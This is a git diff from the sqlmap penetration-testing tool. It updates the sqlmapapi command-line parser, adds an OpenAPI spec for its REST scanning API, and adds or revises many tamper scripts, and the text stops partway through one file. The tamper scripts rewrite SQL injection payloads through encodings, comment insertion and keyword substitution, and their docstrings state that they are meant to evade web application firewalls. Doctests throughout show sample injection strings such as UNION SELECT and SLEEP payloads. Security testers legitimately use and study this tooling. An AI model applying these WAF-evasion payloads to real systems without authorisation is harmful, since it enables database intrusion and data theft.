apiparser.add_option("-H", "--host", help="Host of the REST-JSON API server", default=RESTAPI_SERVER_HOST, action="store") - apiparser.add_option("-p", "--port", help="Port of the the REST-JSON API server", default=RESTAPI_SERVER_PORT, type="int", action="store") - (args, _) = apiparser.parse_args() + apiparser = ArgumentParser() + apiparser.add_argument("-s", "--server", help="Run as a REST-JSON API server", action="store_true") + apiparser.add_argument("-c", "--client", help="Run as a REST-JSON API client", action="store_true") + apiparser.add_argument("-H", "--host", help="Host of the REST-JSON API server (default \"%s\")" % RESTAPI_DEFAULT_ADDRESS, default=RESTAPI_DEFAULT_ADDRESS) + apiparser.add_argument("-p", "--port", help="Port of the REST-JSON API server (default %d)" % RESTAPI_DEFAULT_PORT, default=RESTAPI_DEFAULT_PORT, type=int) + apiparser.add_argument("--adapter", help="Server (bottle) adapter to use (default \"%s\")" % RESTAPI_DEFAULT_ADAPTER, default=RESTAPI_DEFAULT_ADAPTER) + apiparser.add_argument("--database", help="Set IPC database filepath (optional)") + apiparser.add_argument("--username", help="Basic authentication username (optional)") + apiparser.add_argument("--password", help="Basic authentication password (optional)") + (args, _) = apiparser.parse_known_args() if hasattr(apiparser, "parse_known_args") else apiparser.parse_args() # Start the client or the server - if args.server is True: - server(args.host, args.port) - elif args.client is True: - client(args.host, args.port) + if args.server: + server(args.host, args.port, adapter=args.adapter, username=args.username, password=args.password, database=args.database) + elif args.client: + client(args.host, args.port, username=args.username, password=args.password) + else: + apiparser.print_help() + +if __name__ == "__main__": + main() diff --git a/sqlmapapi.yaml b/sqlmapapi.yaml new file mode 100644 index 00000000000..16641c24d8d --- /dev/null +++ b/sqlmapapi.yaml @@ -0,0 +1,297 @@ +openapi: 3.0.1 +info: + title: sqlmapapi OpenAPI/Swagger specification + version: '0.1' +paths: + /version: + get: + description: Fetch server version + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + version: + type: string + example: "1.5.7.7#dev" + success: + type: boolean + example: true + /task/new: + get: + description: Create a new task + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + taskid: + type: string + example: "fad44d6beef72285" + success: + type: boolean + example: true + /task/{taskid}/delete: + get: + description: Delete an existing task + parameters: + - in: path + name: taskid + required: true + schema: + type: string + description: Scan task ID + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + success: + type: boolean + example: true + /option/{taskid}/list: + get: + description: List options for a given task ID + parameters: + - in: path + name: taskid + required: true + schema: + type: string + description: Scan task ID + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + success: + type: boolean + example: true + options: + type: array + items: + type: object + /option/{taskid}/get: + post: + description: Get value of option(s) for a certain task ID + parameters: + - in: path + name: taskid + required: true + schema: + type: string + requestBody: + content: + 
application/json: + schema: + type: array + items: + type: string + example: ["url", "cookie"] + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + success: + type: boolean + options: + type: object + /option/{taskid}/set: + post: + description: Set value of option(s) for a certain task ID + parameters: + - in: path + name: taskid + required: true + schema: + type: string + requestBody: + content: + application/json: + schema: + type: object + example: {"cookie": "id=1"} + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + success: + type: boolean + /scan/{taskid}/start: + post: + description: Launch a scan + parameters: + - in: path + name: taskid + required: true + schema: + type: string + description: Scan task ID + requestBody: + content: + application/json: + schema: + type: object + properties: + url: + type: string + examples: + '0': + value: '{"url":"http://testphp.vulnweb.com/artists.php?artist=1"}' + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + engineid: + type: integer + example: 19720 + success: + type: boolean + example: true + /scan/{taskid}/stop: + get: + description: Stop a scan + parameters: + - in: path + name: taskid + required: true + schema: + type: string + description: Scan task ID + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + success: + type: boolean + example: true + /scan/{taskid}/status: + get: + description: Fetch status of a scan + parameters: + - in: path + name: taskid + required: true + schema: + type: string + description: Scan task ID + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + status: + type: string + example: terminated + returncode: + type: integer + example: 0 + success: + type: boolean + example: true + /scan/{taskid}/data: + get: + description: Retrieve the scan resulting data + parameters: + - in: path + name: taskid + required: true + schema: + type: string + description: Scan task ID + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + data: + type: array + items: + type: object + success: + type: boolean + example: true + error: + type: array + items: + type: object + /scan/{taskid}/log: + get: + description: Retrieve the log messages + parameters: + - in: path + name: taskid + required: true + schema: + type: string + description: Scan task ID + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + log: + type: array + items: + type: object + success: + type: boolean + example: true + /scan/{taskid}/kill: + get: + description: Kill a scan + parameters: + - in: path + name: taskid + required: true + schema: + type: string + description: Scan task ID + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + success: + type: boolean + example: true diff --git a/tamper/0eunion.py b/tamper/0eunion.py new file mode 100644 index 00000000000..5a52c92fa06 --- /dev/null +++ b/tamper/0eunion.py @@ -0,0 +1,32 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + pass + +def 
tamper(payload, **kwargs): + """ + Replaces an integer followed by UNION with an integer followed by e0UNION + + Requirement: + * MySQL + * MsSQL + + Notes: + * Reference: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf + + >>> tamper('1 UNION ALL SELECT') + '1e0UNION ALL SELECT' + """ + + return re.sub(r"(?i)(\d+)\s+(UNION )", r"\g<1>e0\g<2>", payload) if payload else payload diff --git a/tamper/__init__.py b/tamper/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/tamper/__init__.py +++ b/tamper/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/tamper/apostrophemask.py b/tamper/apostrophemask.py index 27389b5760a..9562002a131 100644 --- a/tamper/apostrophemask.py +++ b/tamper/apostrophemask.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.enums import PRIORITY @@ -14,17 +14,16 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces apostrophe character with its UTF-8 full width counterpart - - Example: - * Input: AND '1'='1' - * Output: AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87 + Replaces single quotes (') with their UTF-8 full-width equivalents (e.g. ' -> %EF%BC%87) References: * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128 - * http://lukasz.pilorz.net/testy/unicode_conversion/ - * http://sla.ckers.org/forum/read.php?13,11562,11850 - * http://lukasz.pilorz.net/testy/full_width_utf/index.phps + * https://web.archive.org/web/20130614183121/http://lukasz.pilorz.net/testy/unicode_conversion/ + * https://web.archive.org/web/20131121094431/sla.ckers.org/forum/read.php?13,11562,11850 + * https://web.archive.org/web/20070624194958/http://lukasz.pilorz.net/testy/full_width_utf/index.phps + + >>> tamper("1 AND '1'='1") + '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871' """ return payload.replace('\'', "%EF%BC%87") if payload else payload diff --git a/tamper/apostrophenullencode.py b/tamper/apostrophenullencode.py index 6d2c10937f9..0cbafe30cd6 100644 --- a/tamper/apostrophenullencode.py +++ b/tamper/apostrophenullencode.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.enums import PRIORITY @@ -14,11 +14,10 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces apostrophe character with its illegal double unicode counterpart + Replaces single quotes (') with an illegal double Unicode encoding (e.g. 
' -> %00%27) - Example: - * Input: AND '1'='1' - * Output: AND %00%271%00%27=%00%271%00%27 + >>> tamper("1 AND '1'='1") + '1 AND %00%271%00%27=%00%271' """ return payload.replace('\'', "%00%27") if payload else payload diff --git a/tamper/appendnullbyte.py b/tamper/appendnullbyte.py index 5dfee8c79a5..92a5fb3ef5c 100644 --- a/tamper/appendnullbyte.py +++ b/tamper/appendnullbyte.py @@ -1,24 +1,24 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import os + +from lib.core.common import singleTimeWarnMessage +from lib.core.enums import DBMS from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOWEST def dependencies(): - pass + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.ACCESS)) def tamper(payload, **kwargs): """ - Appends encoded NULL byte character at the end of payload - - Example: - * Input: AND 1=1 - * Output: AND 1=1%00 + Appends an (Access) NULL byte character (%00) at the end of payload Requirement: * Microsoft Access @@ -29,6 +29,9 @@ def tamper(payload, **kwargs): also possible Reference: http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection + + >>> tamper('1 AND 1=1') + '1 AND 1=1%00' """ return "%s%%00" % payload if payload else payload diff --git a/tamper/base64encode.py b/tamper/base64encode.py index 2f9832dcca4..b5de4e74970 100644 --- a/tamper/base64encode.py +++ b/tamper/base64encode.py @@ -1,26 +1,24 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import base64 - +from lib.core.convert import encodeBase64 from lib.core.enums import PRIORITY -__priority__ = PRIORITY.LOWEST +__priority__ = PRIORITY.LOW def dependencies(): pass def tamper(payload, **kwargs): """ - Base64 all characters in a given payload + Encodes the entire payload using Base64 - Example: - * Input: 1' AND SLEEP(5)# - * Output: MScgQU5EIFNMRUVQKDUpIw== + >>> tamper("1' AND SLEEP(5)#") + 'MScgQU5EIFNMRUVQKDUpIw==' """ - return base64.b64encode(payload) if payload else payload + return encodeBase64(payload, binary=False) if payload else payload diff --git a/tamper/between.py b/tamper/between.py index 136fbadf30c..8e9538088f0 100644 --- a/tamper/between.py +++ b/tamper/between.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re @@ -16,11 +16,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' - - Example: - * Input: 'A > B' - * Output: 'A NOT BETWEEN 0 AND B' + Replaces the greater-than operator (>) with NOT BETWEEN 0 AND # and the equal sign (=) with BETWEEN # AND # Tested against: * Microsoft SQL Server 2005 @@ -33,34 +29,31 @@ def tamper(payload, **kwargs): filter the greater than character * The BETWEEN clause is SQL standard. Hence, this tamper script should work against all (?) 
databases + + >>> tamper('1 AND A > B--') + '1 AND A NOT BETWEEN 0 AND B--' + >>> tamper('1 AND A = B--') + '1 AND A BETWEEN B AND B--' + >>> tamper('1 AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()') + '1 AND LAST_INSERT_ROWID() BETWEEN LAST_INSERT_ROWID() AND LAST_INSERT_ROWID()' """ retVal = payload if payload: - retVal = "" - quote, doublequote, firstspace = False, False, False - - for i in xrange(len(payload)): - if not firstspace: - if payload[i].isspace(): - firstspace = True - retVal += " " - continue - - elif payload[i] == '\'': - quote = not quote - - elif payload[i] == '"': - doublequote = not doublequote + match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>]+)\s*\Z", payload) - elif payload[i] == ">" and not doublequote and not quote: - retVal += " " if i > 0 and not payload[i - 1].isspace() else "" - retVal += "NOT BETWEEN %s AND" % ('0' if re.search(r"\A[^\w]*\d", payload[i + 1:]) else "NULL") - retVal += " " if i < len(payload) - 1 and not payload[i + 1:i + 2].isspace() else "" + if match: + _ = "%s %s NOT BETWEEN 0 AND %s" % (match.group(2), match.group(4), match.group(5)) + retVal = retVal.replace(match.group(0), _) + else: + retVal = re.sub(r"\s*>\s*(\d+|'[^']+'|\w+\(\d+\))", r" NOT BETWEEN 0 AND \g<1>", payload) - continue + if retVal == payload: + match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^=]+?)\s*=\s*([\w()]+)\s*", payload) - retVal += payload[i] + if match: + _ = "%s %s BETWEEN %s AND %s" % (match.group(2), match.group(4), match.group(5), match.group(5)) + retVal = retVal.replace(match.group(0), _) return retVal diff --git a/tamper/binary.py b/tamper/binary.py new file mode 100644 index 00000000000..0259b2911da --- /dev/null +++ b/tamper/binary.py @@ -0,0 +1,43 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Injects the keyword binary where applicable + + Requirement: + * MySQL + + >>> tamper('1 UNION ALL SELECT NULL, NULL, NULL') + '1 UNION ALL SELECT binary NULL, binary NULL, binary NULL' + >>> tamper('1 AND 2>1') + '1 AND binary 2>binary 1' + >>> tamper('CASE WHEN (1=1) THEN 1 ELSE 0x28 END') + 'CASE WHEN (binary 1=binary 1) THEN binary 1 ELSE binary 0x28 END' + """ + + retVal = payload + + if payload: + retVal = re.sub(r"\bNULL\b", "binary NULL", retVal) + retVal = re.sub(r"\b(THEN\s+)(\d+|0x[0-9a-f]+)(\s+ELSE\s+)(\d+|0x[0-9a-f]+)", r"\g<1>binary \g<2>\g<3>binary \g<4>", retVal) + retVal = re.sub(r"(\d+\s*[>=]\s*)(\d+)", r"binary \g<1>binary \g<2>", retVal) + retVal = re.sub(r"\b((AND|OR)\s*)(\d+)", r"\g<1>binary \g<3>", retVal) + retVal = re.sub(r"([>=]\s*)(\d+)", r"\g<1>binary \g<2>", retVal) + retVal = re.sub(r"\b(0x[0-9a-f]+)", r"binary \g<1>", retVal) + retVal = re.sub(r"(\s+binary)+", r"\g<1>", retVal) + + return retVal diff --git a/tamper/bluecoat.py b/tamper/bluecoat.py index c5ba2ee39a8..3ca4b8d4a3c 100644 --- a/tamper/bluecoat.py +++ b/tamper/bluecoat.py @@ -1,12 +1,13 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re +from lib.core.data import kb from lib.core.enums import PRIORITY __priority__ = PRIORITY.NORMAL @@ -16,12 +17,7 @@ def 
dependencies(): def tamper(payload, **kwargs): """ - Replaces space character after SQL statement with a valid random blank character. - Afterwards replace character = with LIKE operator - - Example: - * Input: SELECT id FROM users where id = 1 - * Output: SELECT%09id FROM users where id LIKE 1 + Replaces the space following an SQL statement with a random valid blank character, then converts = to LIKE Requirement: * Blue Coat SGOS with WAF activated as documented in @@ -32,12 +28,23 @@ def tamper(payload, **kwargs): Notes: * Useful to bypass Blue Coat's recommended WAF rule configuration + + >>> tamper('SELECT id FROM users WHERE id = 1') + 'SELECT%09id FROM%09users WHERE%09id LIKE 1' """ + def process(match): + word = match.group('word') + if word.upper() in kb.keywords: + return match.group().replace(word, "%s%%09" % word) + else: + return match.group() + retVal = payload if payload: - retVal = re.sub(r"(?i)(SELECT|UPDATE|INSERT|DELETE)\s+", r"\g<1>\t", payload) + retVal = re.sub(r"\b(?P<word>[A-Z_]+)(?=[^\w(]|\Z)", process, retVal) retVal = re.sub(r"\s*=\s*", " LIKE ", retVal) + retVal = retVal.replace("%09 ", "%09") return retVal diff --git a/tamper/chardoubleencode.py b/tamper/chardoubleencode.py index 30a749c065f..4213421cb72 100644 --- a/tamper/chardoubleencode.py +++ b/tamper/chardoubleencode.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import string @@ -16,17 +16,13 @@ def dependencies(): def tamper(payload, **kwargs): """ - Double url-encodes all characters in a given payload (not processing - already encoded) - - Example: - * Input: SELECT FIELD FROM%20TABLE - * Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545 + Double URL-encodes each character in the payload (ignores already encoded ones) (e.g. 
SELECT -> %2553%2545%254C%2545%2543%2554) Notes: - * Useful to bypass some weak web application firewalls that do not - double url-decode the request before processing it through their - ruleset + * Useful to bypass some weak web application firewalls that do not double URL-decode the request before processing it through their ruleset + + >>> tamper('SELECT FIELD FROM%20TABLE') + '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545' """ retVal = payload @@ -37,7 +33,7 @@ def tamper(payload, **kwargs): while i < len(payload): if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: - retVal += payload[i:i + 3] + retVal += '%%25%s' % payload[i + 1:i + 3] i += 3 else: retVal += '%%25%.2X' % ord(payload[i]) diff --git a/tamper/charencode.py b/tamper/charencode.py index ff93d174d92..980406aa12b 100644 --- a/tamper/charencode.py +++ b/tamper/charencode.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import string @@ -16,12 +16,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Url-encodes all characters in a given payload (not processing already - encoded) - - Example: - * Input: SELECT FIELD FROM%20TABLE - * Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45 + URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54) Tested against: * Microsoft SQL Server 2005 @@ -30,10 +25,11 @@ def tamper(payload, **kwargs): * PostgreSQL 8.3, 8.4, 9.0 Notes: - * Useful to bypass very weak web application firewalls that do not - url-decode the request before processing it through their ruleset - * The web server will anyway pass the url-decoded version behind, - hence it should work against any DBMS + * Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset + * The web server will anyway pass the url-decoded version behind, hence it should work against any DBMS + + >>> tamper('SELECT FIELD FROM%20TABLE') + '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45' """ retVal = payload diff --git a/tamper/charunicodeencode.py b/tamper/charunicodeencode.py index c509aec37ee..3772b0b24dd 100644 --- a/tamper/charunicodeencode.py +++ b/tamper/charunicodeencode.py @@ -1,15 +1,15 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os import string -from lib.core.enums import PRIORITY from lib.core.common import singleTimeWarnMessage +from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOWEST @@ -18,12 +18,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Unicode-url-encodes non-encoded characters in a given payload (not - processing already encoded) - - Example: - * Input: SELECT FIELD%20FROM TABLE - * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045' + Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. 
SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054) Requirement: * ASP @@ -36,9 +31,10 @@ def tamper(payload, **kwargs): * PostgreSQL 9.0.3 Notes: - * Useful to bypass weak web application firewalls that do not - unicode url-decode the request before processing it through their - ruleset + * Useful to bypass weak web application firewalls that do not unicode URL-decode the request before processing it through their ruleset + + >>> tamper('SELECT FIELD%20FROM TABLE') + '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045' """ retVal = payload diff --git a/tamper/charunicodeescape.py b/tamper/charunicodeescape.py new file mode 100644 index 00000000000..80b600f9ca0 --- /dev/null +++ b/tamper/charunicodeescape.py @@ -0,0 +1,39 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import string + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.NORMAL + +def tamper(payload, **kwargs): + """ + Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054) + + Notes: + * Useful to bypass weak filtering and/or WAFs in JSON contexes + + >>> tamper('SELECT FIELD FROM TABLE') + '\\\\u0053\\\\u0045\\\\u004C\\\\u0045\\\\u0043\\\\u0054\\\\u0020\\\\u0046\\\\u0049\\\\u0045\\\\u004C\\\\u0044\\\\u0020\\\\u0046\\\\u0052\\\\u004F\\\\u004D\\\\u0020\\\\u0054\\\\u0041\\\\u0042\\\\u004C\\\\u0045' + """ + + retVal = payload + + if payload: + retVal = "" + i = 0 + + while i < len(payload): + if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: + retVal += "\\u00%s" % payload[i + 1:i + 3] + i += 3 + else: + retVal += '\\u%.4X' % ord(payload[i]) + i += 1 + + return retVal diff --git a/tamper/commalesslimit.py b/tamper/commalesslimit.py new file mode 100644 index 00000000000..6361a7563ba --- /dev/null +++ b/tamper/commalesslimit.py @@ -0,0 +1,40 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import os +import re + +from lib.core.common import singleTimeWarnMessage +from lib.core.enums import DBMS +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGH + +def dependencies(): + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) + +def tamper(payload, **kwargs): + """ + Replaces (MySQL) instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' counterpart + + Requirement: + * MySQL + + Tested against: + * MySQL 5.0 and 5.5 + + >>> tamper('LIMIT 2, 3') + 'LIMIT 3 OFFSET 2' + """ + + retVal = payload + + match = re.search(r"(?i)LIMIT\s*(\d+),\s*(\d+)", payload or "") + if match: + retVal = retVal.replace(match.group(0), "LIMIT %s OFFSET %s" % (match.group(2), match.group(1))) + + return retVal diff --git a/tamper/commalessmid.py b/tamper/commalessmid.py new file mode 100644 index 00000000000..6743ddc0876 --- /dev/null +++ b/tamper/commalessmid.py @@ -0,0 +1,44 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import os +import re + +from lib.core.common import singleTimeWarnMessage +from lib.core.enums import DBMS +from lib.core.enums import PRIORITY + +__priority__ = 
PRIORITY.HIGH + +def dependencies(): + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) + +def tamper(payload, **kwargs): + """ + Replaces (MySQL) instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' counterpart + + Requirement: + * MySQL + + Tested against: + * MySQL 5.0 and 5.5 + + >>> tamper('MID(VERSION(), 1, 1)') + 'MID(VERSION() FROM 1 FOR 1)' + """ + + retVal = payload + + warnMsg = "you should consider usage of switch '--no-cast' along with " + warnMsg += "tamper script '%s'" % os.path.basename(__file__).split(".")[0] + singleTimeWarnMessage(warnMsg) + + match = re.search(r"(?i)MID\((.+?)\s*,\s*(\d+)\s*\,\s*(\d+)\s*\)", payload or "") + if match: + retVal = retVal.replace(match.group(0), "MID(%s FROM %s FOR %s)" % (match.group(1), match.group(2), match.group(3))) + + return retVal diff --git a/tamper/commentbeforeparentheses.py b/tamper/commentbeforeparentheses.py new file mode 100644 index 00000000000..a3fbf33b507 --- /dev/null +++ b/tamper/commentbeforeparentheses.py @@ -0,0 +1,40 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.NORMAL + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Prepends (inline) comment before parentheses (e.g. ( -> /**/() + + Tested against: + * Microsoft SQL Server + * MySQL + * Oracle + * PostgreSQL + + Notes: + * Useful to bypass web application firewalls that block usage + of function calls + + >>> tamper('SELECT ABS(1)') + 'SELECT ABS/**/(1)' + """ + + retVal = payload + + if payload: + retVal = re.sub(r"\b(\w+)\(", r"\g<1>/**/(", retVal) + + return retVal diff --git a/tamper/concat2concatws.py b/tamper/concat2concatws.py new file mode 100644 index 00000000000..1aeca3098e2 --- /dev/null +++ b/tamper/concat2concatws.py @@ -0,0 +1,40 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import os + +from lib.core.common import singleTimeWarnMessage +from lib.core.enums import DBMS +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) + +def tamper(payload, **kwargs): + """ + Replaces (MySQL) instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' counterpart + + Requirement: + * MySQL + + Tested against: + * MySQL 5.0 + + Notes: + * Useful to bypass very weak and bespoke web application firewalls + that filter the CONCAT() function + + >>> tamper('CONCAT(1,2)') + 'CONCAT_WS(MID(CHAR(0),0,0),1,2)' + """ + + if payload: + payload = payload.replace("CONCAT(", "CONCAT_WS(MID(CHAR(0),0,0),") + + return payload diff --git a/tamper/decentities.py b/tamper/decentities.py new file mode 100644 index 00000000000..7ecb32cf4d3 --- /dev/null +++ b/tamper/decentities.py @@ -0,0 +1,33 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.LOW + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + HTML encode in decimal (using code points) all characters (e.g. 
' -> &#39;) + + >>> tamper("1' AND SLEEP(5)#") + '&#49;&#39;&#32;&#65;&#78;&#68;&#32;&#83;&#76;&#69;&#69;&#80;&#40;&#53;&#41;&#35;' + """ + + retVal = payload + + if payload: + retVal = "" + i = 0 + + while i < len(payload): + retVal += "&#%s;" % ord(payload[i]) + i += 1 + + return retVal diff --git a/tamper/dunion.py b/tamper/dunion.py new file mode 100644 index 00000000000..db2cd94375d --- /dev/null +++ b/tamper/dunion.py @@ -0,0 +1,34 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import os +import re + +from lib.core.common import singleTimeWarnMessage +from lib.core.enums import DBMS +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.ORACLE)) + +def tamper(payload, **kwargs): + """ + Replaces instances of <int> UNION with <int>DUNION + + Requirement: + * Oracle + + Notes: + * Reference: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf + + >>> tamper('1 UNION ALL SELECT') + '1DUNION ALL SELECT' + """ + + return re.sub(r"(?i)(\d+)\s+(UNION )", r"\g<1>D\g<2>", payload) if payload else payload diff --git a/tamper/equaltolike.py b/tamper/equaltolike.py index 52a80e7b720..9552dcb7a7d 100644 --- a/tamper/equaltolike.py +++ b/tamper/equaltolike.py @@ -1,29 +1,22 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import os import re -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import DBMS from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGHEST def dependencies(): - singleTimeWarnMessage("tamper script '%s' is unlikely to work against %s" % (os.path.basename(__file__).split(".")[0], DBMS.PGSQL)) + pass def tamper(payload, **kwargs): """ - Replaces all occurances of operator equal ('=') with operator 'LIKE' - - Example: - * Input: SELECT * FROM users WHERE id=1 - * Output: SELECT * FROM users WHERE id LIKE 1 + Replaces all 